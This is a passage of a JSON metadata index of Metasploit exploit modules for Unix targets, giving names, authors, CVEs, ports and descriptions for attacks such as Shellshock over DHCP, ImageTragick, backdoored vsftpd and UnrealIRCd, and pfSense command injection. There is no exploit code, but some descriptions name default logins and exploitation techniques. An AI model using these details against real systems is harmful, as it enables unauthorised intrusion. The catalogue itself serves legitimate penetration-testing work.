"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/telnet/ttyprompt.rb",
"is_install_path": true,
"ref_name": "solaris/telnet/ttyprompt",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/dhcp/bash_environment": {
"name": "Dhclient Bash Environment Variable Injection (Shellshock)",
"full_name": "exploit/unix/dhcp/bash_environment",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets dhclient by responding\n to DHCP requests with a malicious hostname, domainname, and URL which are then\n passed to the configuration scripts as environment variables, resulting in code\n execution. Due to length restrictions and the unusual networking scenario at the\n time of exploitation, this module achieves code execution by writing the payload\n into /etc/crontab and then cleaning it up after a session is created.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/",
"URL-https://seclists.org/oss-sec/2014/q3/649",
"URL-https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-09-17 22:29:20 +0000",
"path": "/modules/exploits/unix/dhcp/bash_environment.rb",
"is_install_path": true,
"ref_name": "unix/dhcp/bash_environment",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_unix/dhcp/rhel_dhcp_client_command_injection": {
"name": "DHCP Client Command Injection (DynoRoot)",
"full_name": "exploit/unix/dhcp/rhel_dhcp_client_command_injection",
"rank": 600,
"disclosure_date": "2018-05-15",
"type": "exploit",
"author": [
"Felix Wilhelm",
"Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>"
],
"description": "This module exploits the DynoRoot vulnerability, a flaw in how the\n NetworkManager integration script included in the DHCP client in\n Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier\n processes DHCP options. A malicious DHCP server, or an attacker on\n the local network able to spoof DHCP responses, could use this flaw\n to execute arbitrary commands with root privileges on systems using\n NetworkManager and configured to obtain network configuration using\n the DHCP protocol.",
"references": [
"CVE-2018-1111",
"URL-https://github.com/kkirsche/CVE-2018-1111",
"URL-https://twitter.com/_fel1x/status/996388421273882626?lang=en",
"URL-https://access.redhat.com/security/vulnerabilities/3442151",
"URL-https://dynoroot.ninja/",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2018-1111",
"URL-https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble",
"URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb",
"is_install_path": true,
"ref_name": "unix/dhcp/rhel_dhcp_client_command_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"DynoRoot"
]
}
},
"exploit_unix/fileformat/ghostscript_type_confusion": {
"name": "Ghostscript Type Confusion Arbitrary Command Execution",
"full_name": "exploit/unix/fileformat/ghostscript_type_confusion",
"rank": 600,
"disclosure_date": "2017-04-27",
"type": "exploit",
"author": [
"Atlassian Security Team",
"hdm <x@hdm.io>"
],
"description": "This module exploits a type confusion vulnerability in Ghostscript that can\n be exploited to obtain arbitrary command execution. This vulnerability affects\n Ghostscript versions 9.21 and earlier and can be exploited through libraries\n such as ImageMagick and Pillow.",
"references": [
"CVE-2017-8291",
"URL-https://bugs.ghostscript.com/show_bug.cgi?id=697808",
"URL-https://seclists.org/oss-sec/2017/q2/148",
"URL-https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d",
"URL-https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EPS file"
],
"mod_time": "2019-04-24 11:34:42 +0000",
"path": "/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb",
"is_install_path": true,
"ref_name": "unix/fileformat/ghostscript_type_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ghostbutt"
],
"RelatedModules": [
"exploit/multi/fileformat/ghostscript_failed_restore",
"exploit/unix/fileformat/imagemagick_delegate"
]
}
},
"exploit_unix/fileformat/imagemagick_delegate": {
"name": "ImageMagick Delegate Arbitrary Command Execution",
"full_name": "exploit/unix/fileformat/imagemagick_delegate",
"rank": 600,
"disclosure_date": "2016-05-03",
"type": "exploit",
"author": [
"stewie",
"Nikolay Ermishkin",
"Tavis Ormandy",
"wvu <wvu@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a shell command injection in the way \"delegates\"\n (commands for converting files) are processed in ImageMagick versions\n <= 7.0.1-0 and <= 6.9.3-9 (legacy).\n\n Since ImageMagick uses file magic to detect file format, you can create\n a .png (for example) which is actually a crafted SVG (for example) that\n triggers the command injection.\n\n The PostScript (PS) target leverages a Ghostscript -dSAFER bypass\n (discovered by taviso) to achieve RCE in the Ghostscript delegate.\n Ghostscript versions 9.18 and later are affected. This target is\n provided as is and will not be updated to track additional vulns.\n\n If USE_POPEN is set to true, a |-prefixed command will be used for the\n exploit. No delegates are involved in this exploitation.",
"references": [
"CVE-2016-3714",
"CVE-2016-7976",
"URL-https://imagetragick.com/",
"URL-https://seclists.org/oss-sec/2016/q2/205",
"URL-https://seclists.org/oss-sec/2016/q3/682",
"URL-https://github.com/ImageMagick/ImageMagick/commit/06c41ab",
"URL-https://github.com/ImageMagick/ImageMagick/commit/a347456",
"URL-http://permalink.gmane.org/gmane.comp.security.oss.general/19669"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SVG file",
"MVG file",
"PS file"
],
"mod_time": "2019-04-24 11:34:42 +0000",
"path": "/modules/exploits/unix/fileformat/imagemagick_delegate.rb",
"is_install_path": true,
"ref_name": "unix/fileformat/imagemagick_delegate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ImageTragick"
],
"RelatedModules": [
"exploit/unix/fileformat/ghostscript_type_confusion",
"exploit/multi/fileformat/ghostscript_failed_restore"
]
}
},
"exploit_unix/ftp/proftpd_133c_backdoor": {
"name": "ProFTPD-1.3.3c Backdoor Command Execution",
"full_name": "exploit/unix/ftp/proftpd_133c_backdoor",
"rank": 600,
"disclosure_date": "2010-12-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"darkharper2"
],
"description": "This module exploits a malicious backdoor that was added to the\n ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n archive between November 28th 2010 and 2nd December 2010.",
"references": [
"OSVDB-69562",
"BID-45150"
],
"platform": "Unix",
"arch": "cmd",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/ftp/proftpd_133c_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/ftp/proftpd_modcopy_exec": {
"name": "ProFTPD 1.3.5 Mod_Copy Command Execution",
"full_name": "exploit/unix/ftp/proftpd_modcopy_exec",
"rank": 600,
"disclosure_date": "2015-04-22",
"type": "exploit",
"author": [
"Vadim Melihow",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.\n Any unauthenticated client can leverage these commands to copy files from any\n part of the filesystem to a chosen destination. The copy commands are executed with\n the rights of the ProFTPD service, which by default runs under the privileges of the\n 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website\n directory, PHP remote code execution is made possible.",
"references": [
"CVE-2015-3306",
"EDB-36742"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ProFTPD 1.3.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb",
"is_install_path": true,
"ref_name": "unix/ftp/proftpd_modcopy_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/ftp/vsftpd_234_backdoor": {
"name": "VSFTPD v2.3.4 Backdoor Command Execution",
"full_name": "exploit/unix/ftp/vsftpd_234_backdoor",
"rank": 600,
"disclosure_date": "2011-07-03",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a malicious backdoor that was added to the\tVSFTPD download\n archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n June 30th 2011 and July 1st 2011 according to the most recent information\n available. This backdoor was removed on July 3rd 2011.",
"references": [
"OSVDB-73573",
"URL-http://pastebin.com/AetT9sS5",
"URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/ftp/vsftpd_234_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/contentkeeperweb_mimencode": {
"name": "ContentKeeper Web Remote Command Execution",
"full_name": "exploit/unix/http/contentkeeperweb_mimencode",
"rank": 600,
"disclosure_date": "2009-02-25",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the ContentKeeper Web Appliance. Versions prior\n to 125.10 are affected. This module exploits a combination of weaknesses\n to enable remote command execution as the Apache user. By setting\n SkipEscalation to false, this module will attempt to setuid the bash shell.",
"references": [
"OSVDB-54551",
"OSVDB-54552",
"URL-http://www.aushack.com/200904-contentkeeper.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/http/contentkeeperweb_mimencode.rb",
"is_install_path": true,
"ref_name": "unix/http/contentkeeperweb_mimencode",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/ctek_skyrouter": {
"name": "CTEK SkyRouter 4200 and 4300 Command Execution",
"full_name": "exploit/unix/http/ctek_skyrouter",
"rank": 200,
"disclosure_date": "2011-09-08",
"type": "exploit",
"author": [
"savant42"
],
"description": "This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.",
"references": [
"CVE-2011-5010",
"OSVDB-77497"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/ctek_skyrouter.rb",
"is_install_path": true,
"ref_name": "unix/http/ctek_skyrouter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/dell_kace_k1000_upload": {
"name": "Dell KACE K1000 File Upload",
"full_name": "exploit/unix/http/dell_kace_k1000_upload",
"rank": 600,
"disclosure_date": "2014-03-07",
"type": "exploit",
"author": [
"Bradley Austin (steponequit)",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in Kace K1000\n versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547\n which allows unauthenticated users to execute arbitrary commands\n under the context of the 'www' user.\n\n This module also abuses the 'KSudoClient::RunCommandWait' function\n to gain root privileges.\n\n This module has been tested successfully with Dell KACE K1000\n version 5.3.",
"references": [
"URL-http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/http/dell_kace_k1000_upload.rb",
"is_install_path": true,
"ref_name": "unix/http/dell_kace_k1000_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/epmp1000_get_chart_cmd_shell": {
"name": "Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7)",
"full_name": "exploit/unix/http/epmp1000_get_chart_cmd_shell",
"rank": 600,
"disclosure_date": "2017-12-18",
"type": "exploit",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP1000 device management portal. It requires any one of the following login\n credentials - admin/admin, installer/installer, home/home - to set up a reverse\n netcat shell. The module has been tested on versions 3.1-3.5-RC7.",
"references": [
"CVE-2017-5255",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD"
],
"mod_time": "2017-12-23 03:04:11 +0000",
"path": "/modules/exploits/unix/http/epmp1000_get_chart_cmd_shell.rb",
"is_install_path": true,
"ref_name": "unix/http/epmp1000_get_chart_cmd_shell",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/epmp1000_ping_cmd_shell": {
"name": "Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5)",
"full_name": "exploit/unix/http/epmp1000_ping_cmd_shell",
"rank": 600,
"disclosure_date": "2015-11-28",
"type": "exploit",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP1000 device management portal. It requires any one of the following login\n credentials - admin/admin, installer/installer, home/home - to set up a reverse\n netcat shell.",
"references": [
"CVE-2017-5255",
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"EPMP"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/http/epmp1000_ping_cmd_shell.rb",
"is_install_path": true,
"ref_name": "unix/http/epmp1000_ping_cmd_shell",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/freepbx_callmenum": {
"name": "FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",
"full_name": "exploit/unix/http/freepbx_callmenum",
"rank": 0,
"disclosure_date": "2012-03-20",
"type": "exploit",
"author": [
"muts",
"Martin Tschirsich"
],
"description": "This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.\n Due to the way callme_page.php handles the 'callmenum' parameter, it\n is possible to inject code to the '$channel' variable in function\n callme_startcall in order to gain remote code execution.\n\n Please note in order to use this module properly, you must know the\n extension number, which can be enumerated or bruteforced, or you may\n try some of the default extensions such as 0 or 200. Also, the call\n has to be answered (or go to voice).\n\n Tested on both Elastix and FreePBX ISO image installs.",
"references": [
"CVE-2012-4869",
"OSVDB-80544",
"EDB-18649"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/freepbx_callmenum.rb",
"is_install_path": true,
"ref_name": "unix/http/freepbx_callmenum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/lifesize_room": {
"name": "LifeSize Room Command Injection",
"full_name": "exploit/unix/http/lifesize_room",
"rank": 600,
"disclosure_date": "2011-07-13",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module exploits a vulnerable resource in LifeSize\n Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize\n Room is an appliance and thus the environment is limited\n resulting in a small set of payload options.",
"references": [
"CVE-2011-2763",
"OSVDB-75212"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/unix/http/lifesize_room.rb",
"is_install_path": true,
"ref_name": "unix/http/lifesize_room",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_unix/http/pfsense_clickjacking": {
"name": "Clickjacking Vulnerability In CSRF Error Page pfSense",
"full_name": "exploit/unix/http/pfsense_clickjacking",
"rank": 300,
"disclosure_date": "2017-11-21",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.\n\n pfSense is a free and open source firewall and router. It was found that the\n pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin\n into interacting with a specially crafted webpage it is possible for an attacker\n to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,\n this will result in a full compromise of the pfSense instance.",
"references": [
"CVE-2017-1000479",
"URL-https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html",
"URL-https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes"
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"pfSense <= 2.4.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/http/pfsense_clickjacking.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_clickjacking",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/pfsense_graph_injection_exec": {
"name": "pfSense authenticated graph status RCE",
"full_name": "exploit/unix/http/pfsense_graph_injection_exec",
"rank": 600,
"disclosure_date": "2016-04-18",
"type": "exploit",
"author": [
"Security-Assessment.com",
"Milton Valencia",
"Jared Stephens"
],
"description": "pfSense, a free BSD based open source firewall distribution,\n version <= 2.2.6 contains a remote command execution\n vulnerability post authentication in the _rrd_graph_img.php page.\n The vulnerability occurs via the graph GET parameter. A non-administrative\n authenticated attacker can inject arbitrary operating system commands\n and execute them as the root user. Verified against 2.2.6, 2.2.5, and 2.1.3.",
"references": [
"CVE-2016-10709",
"EDB-39709",
"URL-http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/http/pfsense_graph_injection_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_graph_injection_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/pfsense_group_member_exec": {
"name": "pfSense authenticated group member RCE",
"full_name": "exploit/unix/http/pfsense_group_member_exec",
"rank": 600,
"disclosure_date": "2017-11-06",
"type": "exploit",
"author": [
"s4squatch",
"h00die"
],
"description": "pfSense, a free BSD based open source firewall distribution,\n version <= 2.3.1_1 contains a remote command execution\n vulnerability post authentication in the system_groupmanager.php page.\n Verified against 2.2.6 and 2.3.",
"references": [
"EDB-43128",
"URL-https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-11-20 20:08:28 +0000",
"path": "/modules/exploits/unix/http/pfsense_group_member_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_group_member_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/quest_kace_systems_management_rce": {
"name": "Quest KACE Systems Management Command Injection",
"full_name": "exploit/unix/http/quest_kace_systems_management_rce",
"rank": 600,
"disclosure_date": "2018-05-31",
"type": "exploit",
"author": [
"Leandro Barragan",
"Guido Leo",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in Quest KACE\n Systems Management Appliance version 8.0.318 (and possibly prior).\n\n The `download_agent_installer.php` file allows unauthenticated users\n to execute arbitrary commands as the web server user `www`.\n\n A valid Organization ID is required. The default value is `1`.\n\n A valid Windows agent version number must also be provided. If file\n sharing is enabled, the agent versions are available within the\n `\\kace.local\\client\\agent_provisioning\\windows_platform` Samba share.\n Additionally, various agent versions are listed on the KACE website.\n\n This module has been tested successfully on Quest KACE Systems\n Management Appliance K1000 version 8.0 (Build 8.0.318).",
"references": [
"CVE-2018-11138",
"URL-https://support.quest.com/product-notification/noti-00000134",
"URL-https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/http/quest_kace_systems_management_rce.rb",
"is_install_path": true,
"ref_name": "unix/http/quest_kace_systems_management_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/tnftp_savefile": {
"name": "tnftp \"savefile\" Arbitrary Command Execution",
"full_name": "exploit/unix/http/tnftp_savefile",
"rank": 600,
"disclosure_date": "2014-10-28",
"type": "exploit",
"author": [
"Jared McNeill",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n tnftp's handling of the resolved output filename - called \"savefile\" in\n the source - from a requested resource.\n\n If tnftp is executed without the -o command-line option, it will resolve\n the output filename from the last component of the requested resource.\n\n If the output filename begins with a \"|\" character, tnftp will pass the\n fetched resource's output to the command directly following the \"|\"\n character through the use of the popen() function.",
"references": [
"CVE-2014-8517",
"URL-https://seclists.org/oss-sec/2014/q4/459"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ftp(1)"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/http/tnftp_savefile.rb",
"is_install_path": true,
"ref_name": "unix/http/tnftp_savefile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/twiki_debug_plugins": {
"name": "TWiki Debugenableplugins Remote Code Execution",
"full_name": "exploit/unix/http/twiki_debug_plugins",
"rank": 600,
"disclosure_date": "2014-10-09",
"type": "exploit",
"author": [
"Netanel Rubin",
"h0ng10"
],
"description": "TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\n The value of the debugenableplugins parameter is used without proper sanitization\n in an Perl eval statement which allows remote code execution.",
"references": [
"CVE-2014-7236",
"OSVDB-112977",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/twiki_debug_plugins.rb",
"is_install_path": true,
"ref_name": "unix/http/twiki_debug_plugins",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/vmturbo_vmtadmin_exec_noauth": {
"name": "VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution",
"full_name": "exploit/unix/http/vmturbo_vmtadmin_exec_noauth",
"rank": 600,
"disclosure_date": "2014-06-25",
"type": "exploit",
"author": [
"Emilio Pinna <emilio.pinn@gmail.com>"
],
"description": "VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated\n OS Command injection in the web interface. Use reverse payloads for the most\n reliable results. Since it is a blind OS command injection vulnerability,\n there is no output for the executed command when using the cmd generic payload.\n Port binding payloads are disregarded due to the restrictive firewall settings.\n\n This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and\n 4.6.",
"references": [
"CVE-2014-5073",
"OSVDB-109572",
"URL-http://secunia.com/secunia_research/2014-8/"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix CMD",
"VMTurbo Operations Manager"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb",
"is_install_path": true,
"ref_name": "unix/http/vmturbo_vmtadmin_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/xdebug_unauth_exec": {
"name": "xdebug Unauthenticated OS Command Execution",
"full_name": "exploit/unix/http/xdebug_unauth_exec",
"rank": 600,
"disclosure_date": "2017-09-17",
"type": "exploit",
"author": [
"Ricter Zheng",
"Shaksham Jaiswal",
"Mumbai"
],
"description": "Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.\n This allows the attacker to execute arbitrary php code as the context of the web user.",
"references": [
"URL-https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/",
"URL-https://paper.seebug.org/397/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-05-08 18:10:29 +0000",
"path": "/modules/exploits/unix/http/xdebug_unauth_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/xdebug_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/irc/unreal_ircd_3281_backdoor": {
"name": "UnrealIRCD 3.2.8.1 Backdoor Command Execution",
"full_name": "exploit/unix/irc/unreal_ircd_3281_backdoor",
"rank": 600,
"disclosure_date": "2010-06-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a malicious backdoor that was added to the\n Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the\n Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.",
"references": [
"CVE-2010-2075",
"OSVDB-65445",
"URL-http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/irc/unreal_ircd_3281_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/at_persistence": {
"name": "at(1) Persistence",
"full_name": "exploit/unix/local/at_persistence",
"rank": 600,
"disclosure_date": "1997-01-01",
"type": "exploit",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module achieves persistence by executing payloads via at(1).",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/local/at_persistence.rb",
"is_install_path": true,
"ref_name": "unix/local/at_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/chkrootkit": {
"name": "Chkrootkit Local Privilege Escalation",
"full_name": "exploit/unix/local/chkrootkit",
"rank": 0,
"disclosure_date": "2014-06-04",
"type": "exploit",
"author": [
"Thomas Stangner",
"Julien \"jvoisin\" Voisin"
],
"description": "Chkrootkit before 0.50 will run any executable file named /tmp/update\n as root, allowing a trivial privilege escalation.\n\n WfsDelay is set to 24h, since this is how often a chkrootkit scan is\n scheduled by default.",
"references": [
"CVE-2014-0476",
"OSVDB-107710",
"EDB-33899",
"BID-67813",
"CWE-20",
"URL-https://seclists.org/oss-sec/2014/q2/430"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
